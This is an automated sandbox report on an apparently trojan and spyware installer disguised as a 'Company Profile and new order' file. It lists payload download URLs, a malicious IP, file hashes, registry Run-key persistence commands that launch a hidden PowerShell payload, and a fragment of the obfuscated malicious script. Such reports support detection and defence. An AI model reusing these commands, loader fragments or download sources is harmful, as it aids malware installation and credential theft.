https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzntorage/download/Yo8ryWgWZnzn | msiexec.exe, 00000006.00000003.2722098799.0000000006BB4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.imvu.comr | msiexec.exe, 00000006.00000002.3321265008.0000000022F20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore6lBeq | powershell.exe, 00000002.00000002.2608136076.0000000005261000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://geoplugin.net/json.gpxe? | msiexec.exe, 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.imvu.com | msiexec.exe, msiexec.exe, 0000000C.00000003.2864612972.000000000366D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2864688623.000000000366E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2864652580.000000000366D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2865411974.000000000366E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://contoso.com/Icon | powershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://filetransfer.io/data-package/a8AChfye/download9 | msiexec.exe, 00000006.00000003.2759594214.0000000006BB4000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.nirsoft.net | msiexec.exe, 0000000A.00000002.2878388474.0000000002FF4000.00000004.00000010.00020000.00000000.sdmp | false | - | high
http://nsis.sf.net/NSIS_ErrorError | Company Profile and new order-202401127.scr.exe, Company Profile and new order-202401127.scr.exe.2.dr | false | - | high
http://geoplugin.net/json.gp; | msiexec.exe, 00000006.00000003.2813346419.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://s25.filetransfer.io/ | msiexec.exe, 00000006.00000003.2813346419.0000000006BB3000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | msiexec.exe, 00000006.00000002.3321265008.0000000022F20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | - | high
https://s25.filetransfer.io/5 | msiexec.exe, 00000006.00000003.2722098799.0000000006BB8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpD | msiexec.exe, 00000006.00000003.2813346419.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com | msiexec.exe, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | - | high
https://filetransfer.io/ | msiexec.exe, 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://geoplugin.net/ | msiexec.exe, 00000006.00000003.2813346419.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzn2024 | msiexec.exe, 00000006.00000003.2759594214.0000000006BB4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2722098799.0000000006BB4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpN | msiexec.exe, 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com/accounts/servicelogin | msiexec.exe | false | - | high
http://geoplugin.net/json.gpxe | msiexec.exe, 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://login.live.c5z | msiexec.exe, 0000000A.00000002.2878491403.000000000328F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://login.yahoo.com/config/login | msiexec.exe | false | - | high
https://filetransfer.io/data-package/a8AChfye/download_ | msiexec.exe, 00000006.00000002.3307439894.0000000006B1A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.nirsoft.net/ | msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | - | high
http://www.imvu.comata | msiexec.exe, 0000000C.00000003.2864612972.000000000366D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2864688623.000000000366E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2864652580.000000000366D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2865411974.000000000366E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2608136076.0000000005261000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://geoplugin.net/json.gpZ | msiexec.exe, 00000006.00000003.2813346419.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://filetransfer.io/data-package/a8AChfye/downloadg | msiexec.exe, 00000006.00000002.3307439894.0000000006B1A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.ebuddy.com | msiexec.exe, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.13.139 | s25.filetransfer.io | United States | 13335 | CLOUDFLARENETUS | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
185.29.10.213 | unknown | European Union | 60567 | DATACLUB-SE | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1568022
Start date and time: 2024-12-04 06:35:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 35s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Company Profile and new order-202401127.scr.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@17/15@3/3
EGA Information:
• Successful, ratio: 83.3%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 201
• Number of non-executed functions: 251
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 1856 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
00:36:01 | API Interceptor | 36x Sleep call for process: powershell.exe modified
00:37:49 | API Interceptor | 10x Sleep call for process: msiexec.exe modified
06:37:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Loaded %Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)
06:37:18 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Loaded %Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)
                                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):963
                                                                                          Entropy (8bit):5.014904284428935
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                          MD5:B66CFB6461E507BB577CDE91F270844E
                                                                                          SHA1:6D952DE48032731679F8718D1F1C3F08202507C3
                                                                                          SHA-256:E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
                                                                                          SHA-512:B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
                                                                                          Malicious:false
                                                                                          Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:modified
                                                                                          Size (bytes):53158
                                                                                          Entropy (8bit):5.062687652912555
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                          MD5:5D430F1344CE89737902AEC47C61C930
                                                                                          SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                          SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                          SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                          Malicious:false
                                                                                          Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                          Category:dropped
                                                                                          Size (bytes):15728640
                                                                                          Entropy (8bit):0.10106922760070924
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W
                                                                                          MD5:8474A17101F6B908E85D4EF5495DEF3C
                                                                                          SHA1:7B9993C39B3879C85BF4F343E907B9EBBDB8D30F
                                                                                          SHA-256:56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A
                                                                                          SHA-512:056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0
                                                                                          Malicious:false
                                                                                          Preview:..kb... ...................':...{........................R.....)....{.......{3.h.T.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...........................................{3....................k.....{3..........................#......h.T.....................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2
                                                                                          Entropy (8bit):1.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Qn:Qn
                                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                          Malicious:false
                                                                                          Preview:..
                                                                                          Process:C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):345463
                                                                                          Entropy (8bit):1.2589453319651729
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:lEy8kRpUIE8tvVjZhWBlrT5zAkTqlh5NP4IiLLaRjGSQBFrgKJA82p1w70g7m0ta:L845IxujcM68wv4n3DqV7eh6SS
                                                                                          MD5:CA420D74C808DE4A1B4A1537E96ED62A
                                                                                          SHA1:5263007F7F88D4E787DDC2B7BDF53CD9DFA32FA3
                                                                                          SHA-256:793AF52DD6940850B62FC54FFB954D5234FA0C3A73D05CB1B60C64756D064AD8
                                                                                          SHA-512:6B3BFC4D594FBAB7A7C0C518C003805E5818E7AEAE958161AD1E1B3BA835C1A84D68612304CE775A46507166E7B69459E73336F94828B2B14544C54497EBF43A
                                                                                          Malicious:false
                                                                                          Preview:.........................................Z......W...................................................................................................................i........................`.......................2...............A...e......................................................................7........_....................r.........I............................b..................................................................W...........................................................................................3..............x9...............T....................................................k.................}.........v.....N...................e...........2..j......................................o.........................H.....z.............................................................................................H...........u..........................J...............3...................................................N......../....3......4..................
                                                                                          Process:C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):311973
                                                                                          Entropy (8bit):1.262945840104735
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:YFuIGlD+g5zKkmYUXCQgRqrWnO3qGHtHbrylbKpp7yJAi1M5KPDT5no9sySeRVID:IJZm6/CZKpIPDAXQkQOXkOhQI3C
                                                                                          MD5:7289C214A5E7D8F92DB6177AE5DAF8D8
                                                                                          SHA1:5A4E368FC4FEEC77A864039E88F9E81FDBFA2629
                                                                                          SHA-256:D24127194925112E23075824087835BE75A44BAB639CB6227C7644618F053B02
                                                                                          SHA-512:6110C1277BF6F6627E6BF6458A4A8192BB5E2627BCFB683CBD0ED91BA8FAE417A1AE3A956F41A1A5D37FC4D91471F1255730552CB1266CA062F25E2B27FC0E40
                                                                                          Malicious:false
                                                                                          Preview:................R..........................................S............................#...............>.K....R..............................................ra..m........................g....................................C........[..........F.........m............I...\......................................................J............................................M............y.6....................................c..........................................f..............................................................................................m...............................................................................................................d.k........h............................................................................................'.............>.........................w...k............R................................................!...........................................................r......................v..........................%....$.
                                                                                          Process:C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe
                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (3755), with CRLF, LF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):56355
                                                                                          Entropy (8bit):5.296433386682782
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:WaLT5CxcsKDtyp82tKMAMtIDFX7a+I+peEGQO6GmJ14YNy39RS8QEw0AEEL8Rp5E:R4w+EQ+Dk/k/GYNy39g8oWsUp5+ddV4g
                                                                                          MD5:755FB54225DD285B06C369A2F5E58082
                                                                                          SHA1:F87F62424D1E437C7BD3B8C5FAD3ED40269F140A
                                                                                          SHA-256:81E5C8C7B98950C580EF3681DCA6BFB2729CC82E862DABC118A53442C4C96BC1
                                                                                          SHA-512:4EFEA102C5076A541F96A788D88DC550195ABC0A464B0D36638A8502836077F9C02E0A636C1F9654C693A7C853DF0E6B99EAF6F0D4E5FFB0F81AE64690B3C915
                                                                                          Malicious:true
                                                                                          Preview:$Fossilism=$Forbunden;.....<#Dunblde Cristatella klenavnet Sourishly Congregator astrologiens #>..<#Packboard Obtains Responsens Derbyerne Scenariers Gehenna #>..<#Advertisement Milzbrand Deklamationsnummer Programlinien Satellitbys #>..<#Freres Chokoladens Filiating Overtrace Forbrugersikkerhedskommissr #>..<#Traineeship lechuguilla Cinchonicin Jalls #>..<#Sh sniveling Stubharverne Poorhouses #>...$Sulphapyrazine = @'.Polyn.Betat$in laUInternTryghvTrykse DaddnManchdSuperahvi ebUn,erl Dom eUnpetnPortae,utoksAp iss Blte1Lreri0Sp,ac2B.ndf=Selsk$S.verTLin eeharebrEvi.ct vuloeBolignGainsafug.inFodbotOveree Krone eltofViatoeStammrShippsRegio;suk e.TegngfNonaduIntern n nbcUkul.tFors iR kehoSgernnJuri. EtfagNResetuKlaselAntiplferrae SilddbeknoeE istrTrys. B sta(Senat$DespoSFalletNonexe Subdr SndeeWithtoNonresJobbepCodd e BundcUnderiSpagnf GataiBac ic areli .yortSplanyChy o,Tomca$rotanTBib ieAab,rrR pent ntogegna,tn unctaTyl nnRa out oeh) Unet Na ci{ kaj .Unde .Surro$SorboT berah U deosuperr
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                          Category:dropped
                                                                                          Size (bytes):798379
                                                                                          Entropy (8bit):7.602292730912973
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:XXa6zw6GW2F+5XizizdI+9kUWM6vQWO0v1wb1EVLz56TE/n0koAHf9qo05bWYpD/:XXal655XEIimkUd0dPpL04/9X05bj
                                                                                          MD5:935BDB714D2C6A118E9C6BFD941084B8
                                                                                          SHA1:817F3F195D61D459FBBDAC24E5A4F014D927EDCF
                                                                                          SHA-256:C69B2064C89C254DBEDA8F204B3A60AB753816DDFF618BE9D593CB9839CFE09D
                                                                                          SHA-512:6915674B2CF0BBC300F18DC26FD983BB69D5DDF8EC7D00831915AE6D5602D0B770D5E785AB8B0D33B9E0C353773E2777273FF6E8383D7332A54FE2440976EDE4
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...c.d.................f...".......4............@.......................................@..........................................`...............................................................................................................text...Ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...................................rsrc........`......................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):26
                                                                                          Entropy (8bit):3.95006375643621
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                          Malicious:true
                                                                                          Preview:[ZoneTransfer]....ZoneId=0
Process: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe
File Type: data
Category: dropped
Size (bytes): 367556
Entropy (8bit): 7.614085263659085
Encrypted: false
SSDEEP: 6144:WuszpuzJL2H20jxgw/veskcFpiNdvzbXvYeLxaLrsPp:MpaF2W0xgiGskKwNdvzbXwcx5
MD5: D1E068D6F404618FB2865467CA5A6C8A
SHA1: EA38B343CA3CC8669A1201977F453E3D59BBD904
SHA-256: 4D22F5607F2C5579E7296AD7C71AE84DE5AF8BDA148B653E99FC5CFFEF569136
SHA-512: 5A4C72EE6CCDC80FC0815EE9F68BFD93E22F9FD891CB5A60D843B8318AE9C538A6CE9C3AA18EE3017A1EE615ED2E485D07BD722CCC91B200BAEFF02254F85FFD
Malicious: false
                                                                                          Preview:.....99..\.....F...(.55..'''....................................Z.lll.....................444..L.........................(((((...]........g..........q..h..D.......nnn......((.:.........>>.........zzz.I.<...E.U....f.OO..**.^..........................=.........##......!!!!.................uuuu.........................................YYY...........Y.............\...............................................3.............g.}}.......!.))...K.....................JJJJ.........ee...............????........+...................gg........p.....gg...e.5............g...................jj..ww.......... .........!..<<<..............,,........nnnn..........P...................II........<.......k.......mmm.ssssss......((.i............................9............N...$.).;.........m..4.e........xx...n....^^.........w....s............}...dd........................II..........6.....QQQQQQ..............C.------...........................B.55.........==............................*...............l......mm
Process: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe
File Type: data
Category: dropped
Size (bytes): 468556
Entropy (8bit): 1.2514000212854544
Encrypted: false
SSDEEP: 768:bDg8f09zYlRoz7NY5qertTYJ5NUbuhKrrEMyjX2Zzo5qgR0ermAVJ52U/QYoWG2x:IF5oUJDTT/lotLY+HnIT+y87CqxUrL
MD5: C4593A1D5ED5EC3C733E913BA4147194
SHA1: D1964826F81325336FDB85D260571BA6BF9FBBE9
SHA-256: DE2575AB427C3890C936EE9AF27ADCA2E94478116A3267ECF246469390A06AAD
SHA-512: F3B66E25405D8C46571E0173F34420FA4D352DDFFF698F7E642811B129B508A08A08B5915B7E722AD542AADA390AFC0366CD6DCB01E3768F40620E7E36C0B9E4
Malicious: false
                                                                                          Preview:......................................k.........C...............................................................................`m............t.H.................................x.......................................................c..................................<........-..................H..........................r..Q......e...........................................2..............................Y...............................................................................g.............v...........L.........._.........r..G...................9.................E.....................................^........................................i...........................................o..............................c..m...............................................................G...............4....L...........................V....................................s...k....................................'............................Z...........................................
File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.602292730912973
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Company Profile and new order-202401127.scr.exe
File size: 798'379 bytes
MD5: 935bdb714d2c6a118e9c6bfd941084b8
SHA1: 817f3f195d61d459fbbdac24e5a4f014d927edcf
SHA256: c69b2064c89c254dbeda8f204b3a60ab753816ddff618be9d593cb9839cfe09d
SHA512: 6915674b2cf0bbc300f18dc26fd983bb69d5ddf8ec7d00831915ae6d5602d0b770d5e785ab8b0d33b9e0c353773e2777273ff6e8383d7332a54fe2440976ede4
SSDEEP: 12288:XXa6zw6GW2F+5XizizdI+9kUWM6vQWO0v1wb1EVLz56TE/n0koAHf9qo05bWYpD/:XXal655XEIimkUd0dPpL04/9X05bj
TLSH: 9D0512896F6CEF07E1A74F308DB4F7225EB85CB0895B6702DF11FE0CAA756C56A05806
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...c..d.................f...".....
Icon Hash: 9e33493c7a7c5da7
Entrypoint: 0x4034fc
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
